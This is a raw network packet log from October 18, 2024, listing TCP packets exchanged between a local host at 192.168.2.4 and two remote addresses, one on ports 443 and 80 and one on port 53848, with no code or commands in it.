                                                            Oct 18, 2024 12:39:49.396397114 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.396472931 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.396493912 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.396533966 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.509535074 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.509566069 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.509603024 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.509613037 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.509635925 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.509646893 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.526643991 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.526660919 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.526777029 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.526787043 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.526889086 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.632690907 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.632709980 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.632761955 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.632796049 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.632812023 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.632834911 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.749922991 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.749939919 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.749994040 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.750013113 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.750027895 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.750045061 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.867212057 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.867230892 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.867302895 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.867340088 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.867358923 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.867371082 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.923579931 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.923595905 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.923679113 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.923691988 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.923732042 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.985841990 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.985857964 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.985924959 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.985938072 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:49.985975981 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:49.985985994 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.102575064 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.102596998 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.102646112 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.102664948 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.102689028 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.102701902 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.159012079 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.159029961 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.159087896 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.159101009 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.159122944 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.159133911 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.220765114 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.220782042 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.220848083 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.220860004 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.220873117 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.220895052 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.337414026 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.337429047 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.337486029 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.337497950 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.337516069 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.337531090 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.392591953 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.392607927 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.392662048 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.392674923 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.392710924 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.455703020 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.455718994 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.455765009 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.455777884 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.455790043 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.455817938 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.512392044 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.512419939 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.512465954 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.512475014 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.512487888 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.512526035 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.574126959 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.574148893 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.574199915 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.574214935 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.574229002 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.574254990 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.630652905 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.630672932 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.630748034 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.630759001 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.630799055 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.691400051 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.691415071 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.691466093 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.691477060 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:50.691489935 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:50.691514015 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.761089087 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.761097908 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.761148930 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.761172056 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.761204004 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.761219025 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.761244059 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.763127089 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.763142109 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.763273954 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.763282061 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.763324022 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.764254093 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.764267921 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.764323950 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.764331102 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.764364004 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.765196085 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.765240908 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.765244961 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.765289068 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.766386986 CEST49739443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.766403913 CEST4434973989.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:51.903846025 CEST4973880192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:51.908710003 CEST804973889.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:52.173054934 CEST804973889.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:52.173120975 CEST4973880192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:52.173696995 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:52.173726082 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:52.173805952 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:52.174220085 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:52.174230099 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.077306032 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.077377081 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.077867031 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.077872992 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.078051090 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.078056097 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.353332043 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.355950117 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.501302958 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.501316071 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.501374006 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.501388073 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.501404047 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.501426935 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.501449108 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.622009039 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.622034073 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.622226954 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.622236013 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.622281075 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.736772060 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.736795902 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.736881018 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.736887932 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.736929893 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.856762886 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.856790066 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.856847048 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.856856108 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.856882095 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.856904984 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.972292900 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.972327948 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.972362995 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.972372055 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:53.972385883 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:53.972404957 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.090548038 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.090595007 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.090615034 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.090620995 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.090641975 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.090661049 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.207942963 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.207967997 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.208026886 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.208034992 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.208048105 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.208071947 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.325896978 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.325917959 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.325959921 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.325967073 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.325983047 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.326008081 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.328578949 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.328599930 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.328635931 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.328641891 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.328653097 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.328675032 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.445616007 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.445640087 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.445688009 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.445693016 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.445725918 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.562024117 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.562046051 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.562087059 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.562092066 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.562113047 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.562131882 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.679563999 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.679584980 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.679642916 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.679649115 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.679660082 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.679680109 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.682152033 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.682172060 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.682241917 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.682249069 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.682291031 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.798075914 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.798098087 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.798158884 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.798166990 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.798188925 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.798211098 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.915405035 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.915436983 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.915600061 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.915606022 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.915644884 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.917610884 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.917649031 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.917679071 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.917685032 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:54.917697906 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:54.917721033 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.034007072 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.034030914 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.034138918 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.034140110 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.034147978 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.034184933 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.035938025 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.035958052 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.035998106 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.036004066 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.036016941 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.036040068 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.152956009 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.152981043 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.153024912 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.153032064 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.153064966 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.153074026 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.268663883 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.268690109 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.268748045 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.268755913 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.268770933 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.268790960 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.270972013 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.270993948 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.271033049 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.271039009 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.271059990 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.271068096 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.386538982 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.386558056 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.386632919 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.386639118 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.386682987 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.389025927 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.389050007 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.389081001 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.389086962 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.389103889 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.389122009 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.504183054 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.504208088 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.504271984 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.504286051 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.504297972 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.504322052 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.507240057 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.507282019 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.507303953 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.507309914 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.507323027 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.507348061 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.621685028 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.621709108 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.621896029 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.621910095 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.621957064 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.624500036 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.624519110 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.624567986 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.624573946 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.624783039 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.739729881 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.739757061 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.739803076 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.739810944 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.739835024 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.739852905 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.742487907 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.742507935 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.742539883 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.742544889 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.742573023 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.742585897 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857511997 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857530117 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857592106 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857599020 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857608080 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857628107 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857683897 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857729912 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857737064 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857758999 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857768059 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857777119 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:55.857780933 CEST4434974089.44.138.129192.168.2.4
                                                            Oct 18, 2024 12:39:55.857791901 CEST49740443192.168.2.489.44.138.129
                                                            Oct 18, 2024 12:39:59.385492086 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:39:59.390455961 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:39:59.390522003 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:39:59.393770933 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:39:59.398696899 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:00.574207067 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:00.628699064 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:00.867521048 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:00.873838902 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:00.878968000 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:00.881920099 CEST4974253848192.168.2.4193.187.91.216
                                                            Oct 18, 2024 12:40:00.886960030 CEST5384849742193.187.91.216192.168.2.4
                                                            Oct 18, 2024 12:40:01.303934097 CEST5384849742193.187.91.216192.168.2.4
